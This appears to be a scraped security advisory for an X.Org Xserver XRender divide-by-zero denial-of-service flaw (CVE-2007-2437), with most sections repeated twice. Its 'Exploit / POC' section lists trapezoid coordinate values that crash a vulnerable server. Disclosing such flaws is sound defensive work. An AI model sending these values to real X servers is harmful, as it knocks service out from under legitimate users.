X.Org X Window System Xserver XRender Extension Divide by Zero Denial of Service Vulnerability
BID:23741
Info
X.Org X Window System Xserver XRender Extension Divide by Zero Denial of Service Vulnerability
| Bugtraq ID: | 23741 |
| Class: | Design Error |
| CVE: |
CVE-2007-2437 |
| Remote: | Yes |
| Local: | Yes |
| Published: | May 01 2007 12:00AM |
| Updated: | May 07 2015 05:39PM |
| Credit: | Derek Abdine of Rapid7 is credited with the discovery of this vulnerability. |
| Vulnerable: |
X.org Xserver 1.3 X.org X11R7 7.2 X.org X11R7 7.1 X.org X11R7 7.0 Sun Solaris 9_x86 Sun Solaris 10_x86 |
| Not Vulnerable: | |
Discussion
X.Org X Window System Xserver XRender Extension Divide by Zero Denial of Service Vulnerability
X.Org X Window System Xserver is prone to a denial-of-service vulnerabilty because the software fails to properly handle exceptional conditions.
Attackers who can connect to a vulnerable X server may exploit this issue to crash the targeted server, denying futher service to legitimate users.
X.Org X Window System Xserver 1.3.0 is vulnerable to this issue; other versions may also be affected.
X.Org X Window System Xserver is prone to a denial-of-service vulnerabilty because the software fails to properly handle exceptional conditions.
Attackers who can connect to a vulnerable X server may exploit this issue to crash the targeted server, denying futher service to legitimate users.
X.Org X Window System Xserver 1.3.0 is vulnerable to this issue; other versions may also be affected.
Exploit / POC
X.Org X Window System Xserver XRender Extension Divide by Zero Denial of Service Vulnerability
Attackers use standard X client API calls to exploit this issue. The following trapezoid data is sufficient to demonstrate this issue:
pTraps[0].top = 13275;
pTraps[0].bottom = 26791;
pTraps[0].left.p1.x = 26765;
pTraps[0].left.p1.y = 13802;
pTraps[0].left.p2.x = 48451;
pTraps[0].left.p2.y = 1366;
pTraps[0].right.p1.x = 45782;
pTraps[0].right.p1.y = 14369;
pTraps[0].right.p2.x = 50685;
pTraps[0].right.p2.y = 3518;
pTraps[1].top = 52058;
pTraps[1].bottom = 56949;
pTraps[1].left.p1.x = 7641;
pTraps[1].left.p1.y = 35604;
pTraps[1].left.p2.x = 18593;
pTraps[1].left.p2.y = 60832;
pTraps[1].right.p1.x = 45277;
pTraps[1].right.p1.y = 1073;
pTraps[1].right.p2.x = 51659;
pTraps[1].right.p2.y = 1073;
pTraps[2].top = 53368;
pTraps[2].bottom = 18772;
pTraps[2].left.p1.x = 34644;
pTraps[2].left.p1.y = 11603;
pTraps[2].left.p2.x = 24261;
pTraps[2].left.p2.y = 13272;
pTraps[2].right.p1.x = 54806;
pTraps[2].right.p1.y = 46200;
pTraps[2].right.p2.x = 5052;
pTraps[2].right.p2.y = 22005;
Attackers use standard X client API calls to exploit this issue. The following trapezoid data is sufficient to demonstrate this issue:
pTraps[0].top = 13275;
pTraps[0].bottom = 26791;
pTraps[0].left.p1.x = 26765;
pTraps[0].left.p1.y = 13802;
pTraps[0].left.p2.x = 48451;
pTraps[0].left.p2.y = 1366;
pTraps[0].right.p1.x = 45782;
pTraps[0].right.p1.y = 14369;
pTraps[0].right.p2.x = 50685;
pTraps[0].right.p2.y = 3518;
pTraps[1].top = 52058;
pTraps[1].bottom = 56949;
pTraps[1].left.p1.x = 7641;
pTraps[1].left.p1.y = 35604;
pTraps[1].left.p2.x = 18593;
pTraps[1].left.p2.y = 60832;
pTraps[1].right.p1.x = 45277;
pTraps[1].right.p1.y = 1073;
pTraps[1].right.p2.x = 51659;
pTraps[1].right.p2.y = 1073;
pTraps[2].top = 53368;
pTraps[2].bottom = 18772;
pTraps[2].left.p1.x = 34644;
pTraps[2].left.p1.y = 11603;
pTraps[2].left.p2.x = 24261;
pTraps[2].left.p2.y = 13272;
pTraps[2].right.p1.x = 54806;
pTraps[2].right.p1.y = 46200;
pTraps[2].right.p2.x = 5052;
pTraps[2].right.p2.y = 22005;
Solution / Fix
X.Org X Window System Xserver XRender Extension Divide by Zero Denial of Service Vulnerability
Solution:
The reporter of this issue states that Xserver 1.3.1 will contain a fix.
Please see the referenced advisories for further information.
Solution:
The reporter of this issue states that Xserver 1.3.1 will contain a fix.
Please see the referenced advisories for further information.
References
X.Org X Window System Xserver XRender Extension Divide by Zero Denial of Service Vulnerability
References:
References:
- X.Org Home Page (X.Org)
- X.Org Security Page (X.Org)
- Rapid7 Advisory R7-0027: Denial-of-Service in the Xrender Extension's Trapezoid (Rapid7)
- Solution 200067 : Xorg(1) Contains a Denial of Service Within the X Render Exte (Sun)
- Sun Alert ID: 102901 Xorg(1) Contains a Denial of Service Within the X Render Ex (Sun)